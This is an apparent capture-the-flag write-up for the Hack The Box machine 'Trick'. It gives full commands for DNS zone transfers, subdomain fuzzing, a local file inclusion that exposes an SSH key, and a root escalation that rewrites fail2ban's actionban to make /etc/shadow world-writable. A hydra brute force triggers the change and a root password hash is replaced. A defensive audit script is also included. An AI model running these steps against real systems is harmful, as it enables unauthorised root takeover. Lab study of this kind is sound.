NETWORK ENUMERATION

DNS Enumeration

Let’s attempt to get a domain name for the IP address using nslookup.

We found trick.htb.

Let’s try a zone transfer on this domain.

host -l trick.htb 10.10.11.166 > zonetransfer.txt

Unfortunately, the zone transfer didn't give us any more subdomains.

Using the following dig command, dig @10.10.11.166 trick.htb axfr, we successfully retrieved some subdomains.

Host enumeration

Host enumeration gives us an extra option: preprod-marketing.trick.htb

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: preprod-FUZZ.trick.htb" -u http://trick.htb -fs 5480 -s

Let's add trick.htb, root.trick.htb, preprod-payroll.trick.htb and preprod-marketing.trick.htb to our /etc/hosts file.

preprod-payroll.trick.htb

preprod-marketing.trick.htb

Using dotdotpwn with the following command

/usr/sbin/dotdotpwn -u http://preprod-marketing.trick.htb/index.php\?page\=TRAVERSAL -M GET -m http-url -k root -q -b

we are able to reveal a local file inclusion on the server.

We now have Michael's SSH private key.

FOOTHOLD

Using Michael's SSH key, we can access the machine.

Privilege Escalation via fail2ban

fail2ban is a great IDPS tool: not only can it detect attacks, it can also block the malicious IP addresses using Linux iptables.

The fail2ban daemon reads the log files and, if a malicious pattern is detected (e.g. multiple failed login requests), it executes a command that blocks the IP for a certain period of time, or possibly forever.

Checking, we can see it is running:

Looking at the config, we see it's protecting SSH:

Checking the installed version, we see it's old:

Running the following command on the server

CMD='chmod 777 /etc/shadow'; sed -i -E "s\actionban =.*\actionban = $CMD\g" /etc/fail2ban/action.d/iptables-multiport.conf;sed -i -E "s\actionunban =.*\actionunban = $CMD\g" /etc/fail2ban/action.d/iptables-multiport.conf; cat /etc/fail2ban/action.d/iptables-multiport.conf | grep actionunban;cat /etc/fail2ban/action.d/iptables-multiport.conf | grep actionban;sudo /etc/init.d/fail2ban restart

changes the actionban and actionunban entries in /etc/fail2ban/action.d/iptables-multiport.conf, which are the commands fail2ban runs (as root) when it detects an attack. This is possible because we have write permissions on the folder /etc/fail2ban/action.d/.
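As an added defensive check that is not part of this writeup, the following POSIX shell function audits an action.d directory for exactly the weakness used here: a directory or action file writable by group/others, and actionban/actionunban lines that no longer call iptables. The default path and the iptables*.conf file-name pattern are assumptions.

```shell
#!/bin/sh
# Audit a fail2ban action.d directory for the two conditions behind the
# escalation above: fail2ban runs actionban/actionunban as root, so
#  (1) a directory or action file writable by group/others lets any local
#      user plant a command there, and
#  (2) an action line that no longer calls iptables (literally or via the
#      <iptables> tag used since fail2ban 0.10) is a sign it was replaced.
# Prints one "FINDING: ..." line per issue; returns 0 if clean, 1 otherwise.
audit_fail2ban_actions() {
    dir="${1:-/etc/fail2ban/action.d}"   # assumed default location
    findings=0
    if [ ! -d "$dir" ]; then
        echo "ERROR: $dir is not a directory" >&2
        return 2
    fi
    # (1) the directory itself plus every entry directly inside it
    writable=$(find "$dir" -maxdepth 1 \( -perm -g+w -o -perm -o+w \))
    if [ -n "$writable" ]; then
        printf '%s\n' "$writable" | while IFS= read -r p; do
            echo "FINDING: $p is group- or world-writable"
        done
        findings=$((findings + $(printf '%s\n' "$writable" | wc -l)))
    fi
    # (2) every actionban/actionunban line of the iptables actions
    for f in "$dir"/iptables*.conf; do
        [ -f "$f" ] || continue
        bad=$(grep -E '^[[:space:]]*action(un)?ban[[:space:]]*=' "$f" \
              | grep -v 'iptables' || true)
        [ -n "$bad" ] || continue
        printf '%s\n' "$bad" | while IFS= read -r line; do
            echo "FINDING: $f: unexpected action command: $line"
        done
        findings=$((findings + $(printf '%s\n' "$bad" | wc -l)))
    done
    [ "$findings" -eq 0 ]
}

# Run directly against a directory given on the command line, e.g.
#   sh audit.sh /etc/fail2ban/action.d
if [ "$#" -gt 0 ]; then
    audit_fail2ban_actions "$1"
fi
```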

To trigger the fail2ban actions, we use the following hydra command, which is an SSH brute force (with a fake user to trigger failed logins):

hydra -l tom -P /usr/share/wordlists/rockyou.txt 10.10.11.166 ssh -v

Thanks to this command, we then get:

We then generate a password hash with the following command:

python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'

Then we replace the password hash of user root in /etc/shadow with the generated one:

root:$6$salt$uoy3eLWQ8ZK7dv2FoRxQrkOYfc4FT4qDjc1PCObX5vKn4MZgpfwn8Fm0Ve5u63zmaabiFiQWOZeF2qZDQk18Q0:19194:0:99999:7:::

This gives us access to the root account.